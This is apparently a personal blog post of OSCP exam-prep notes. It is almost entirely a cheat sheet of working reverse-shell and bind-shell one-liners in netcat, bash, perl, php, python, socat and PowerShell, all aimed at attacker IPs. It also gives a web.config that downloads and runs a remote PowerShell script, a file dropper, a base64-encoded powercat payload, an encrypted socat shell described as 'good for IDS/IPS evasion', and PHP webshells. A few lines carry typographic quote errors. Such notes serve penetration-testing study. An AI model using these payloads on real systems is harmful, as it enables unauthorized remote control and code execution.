OSCP notes dump: #POSTEXPLOIT-SHELL

Philipp Fragstein

4 min read
Photo by Marc Rentschler / Unsplash

Establishing a stable connection to the target is one of the most important steps before compromising it's network. Executing exploits over and over again may trigger the blue team's attention. I made some notes during my OSCP preparation about shells but most of the time I used pentestmonkey (https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet) or highon.coffee (https://highon.coffee/blog/reverse-shell-cheat-sheet/). However, there might be some additional information in my notes that could be helpful.

Shell Beautifier 

python -c 'import pty;pty.spawn("/bin/bash")'
^Z
stty raw -echo; fg
export SHELL=bash
export TERM=xterm-256color

Reverse TCP

netcat

# 1. attackers box  - spawn listener
nc -nlvp 4444 
# -n numeric mode, only IP address
# -l  listen mode, for inbound connections
# -v verbose mode
# -p local port number
# 2. target - connect to listener
nc <IP of attackers box> 4444 -e /bin/bash
# -e filename to execute after connect

bash

bash -i >& /dev/tcp/<IP of attackers box>/4444 0>&1

perl 

perl -e 'use Socket;$i=„10.10.14.12“;$p=1337;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

php

php -r '$sock=fsockopen("<attackers box IP>“,4444);exec("/bin/sh -i <&3 >&3 2>&3");'

xterm

xterm -display <IP of attackers box>:1
# start X Server (:1 – which listens on TCP port 6001). run on your system
xnest :1
# authorize the target to connect to you (command also run on your host):
xhost +<targetip>

socat

# on kali 
socat -d -d TCP4-LISTEN:80 STDOUT
# on victim 
socat TCP4:172.16.5.1:80 EXEC:/bin/bash

python

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

webconfig

<?xml version="1.0" encoding="UTF-8"?>
<configuration>
    <system.webServer>
      <handlers accessPolicy="Read, Script, Write">
         <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
      </handlers>
      <security>
         <requestFiltering>
            <fileExtensions>
               <remove fileExtension=".config" />
            </fileExtensions>
            <hiddenSegments>
               <remove segment="web.config" />
            </hiddenSegments>
         </requestFiltering>
      </security>
   </system.webServer>
</configuration>
<%@ Language=VBScript %>
<%
  call Server.CreateObject("WSCRIPT.SHELL").Run("cmd.exe /c powershell.exe -c iex(new-object net.webclient).downloadstring('http://10.10.14.5/Invoke-PowerShellTcp.ps1')")
%>

powershell

$client = New-Object System.Net.Sockets.TCPClient -ArgumentList '10.10.1.2',443
$stream = $client.GetStream()
$bytes = 0..65535 | ForEach-Object {0}
while (($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)
{
$data = (New-Object System.Text.ASCIIEncoding).GetString($bytes, 0, $i)
$sendback = iex $data 2>&1 | Out-String
$sendback2 = "$sendback PS $(Get-Location).Path> "
$sendbyte = [System.Text.Encoding]::ASCII.GetBytes($sendback2)
$stream.Write($sendbyte, 0, $sendbyte.Length)
$stream.Flush()
}
$client.Close()
powershell -c "$client = New-Object System.Net.Sockets.TCPClient -ArgumentList '192.168.119.210',7777; $stream = $client.GetStream(); $bytes = 0..65535 | ForEach-Object {0}; while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){ $data = (New-Object System.Text.ASCIIEncoding).GetString($bytes, 0, $i); $sendback = iex $data 2>&1 | Out-String; $sendback2 = $sendback + 'PS ' + $(Get-Location).Path + '> '; $sendbyte = [System.Text.Encoding]::ASCII.GetBytes($sendback2); $stream.Write($sendbyte, 0, $sendbyte.Length); $stream.Flush()}; $client.Close()"

powercat

# attacker
nv -nlvp 1337
# target
powercat -c 10.11.0.4 -p 1337 -e cmd.exe
# encoded (base64) stand-alone payload
PS: powercat -c <attack-ip> -p 1337 -e cmd.exe -ge > reverseshell.ps1
# target
powershell.exe -E <whole-base64-string-of-reverseshell.ps1>

windows file dropper

powershell -NoLogo -Command "$webClient = new-object System.Net.WebClient; $webClient.DownloadFile('http://10.10.11.12/Powerless.bat', ‘powerless.bat’)"
nc.exe 192.123.111.1 1337 -e cmd.exe

Bind TCP

netcat

# attackers box
nc <attackers box IP> 4444
# target
nc -nlvp 4444 -e /bin/bash
# -n numeric mode, only IP address
# -l  listen mode, for inbound connections
# -v verbose mode
# -p local port number

socat (good for IDS/IPS evasion)

# create self-signed cert
openssl req -newkey rsa:2048 -nodes -keyout shell.key -x509 -days 362 -out shell.crt
# target
sudo socat OPENSSL-LISTEN:443,cert=shell.pem,verify=0,fork EXEC:/bin/bash
# attacker 
socat - OPENSSL:10.11.0.4:443,verify=0

powercat (windows)

# target
powercat -l -v -p 1337 -e cmd.exe
# attacker
nc <target-ip> 1337

powershell (windows)

powershell -c "$listener = New-Object System.Net.Sockets.TcpListener -ArgumentList '0.0.0.0',443; $listener.Start(); $client = $listener.AcceptTcpClient(); $stream = $client.GetStream(); $bytes = 0..65535 | ForEach-Object {0}; while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){ $data = (New-Object System.Text.ASCIIEncoding).GetString($bytes,0, $i); $sendback = iex $data 2>&1 | Out-String; $sendback2 = $sendback + 'PS ' + $(Get-Location).Path + '> '; $sendbyte = [System.Text.Encoding]::ASCII.GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()}; $client.Close(); $listener.Stop()"

Webshell

kali linux webshells

 /usr/share/webshells/php/

ippsec style

index.php&ipp=ls
<?php echo system($_REQUEST["ipp"]); ?>
<?php echo shell_exec($_GET['cmd']); ?>

weevely3 weaponized web shell

GitHub - epinna/weevely3: Weaponized web shell
Weaponized web shell. Contribute to epinna/weevely3 development by creating an account on GitHub.
GitHubepinna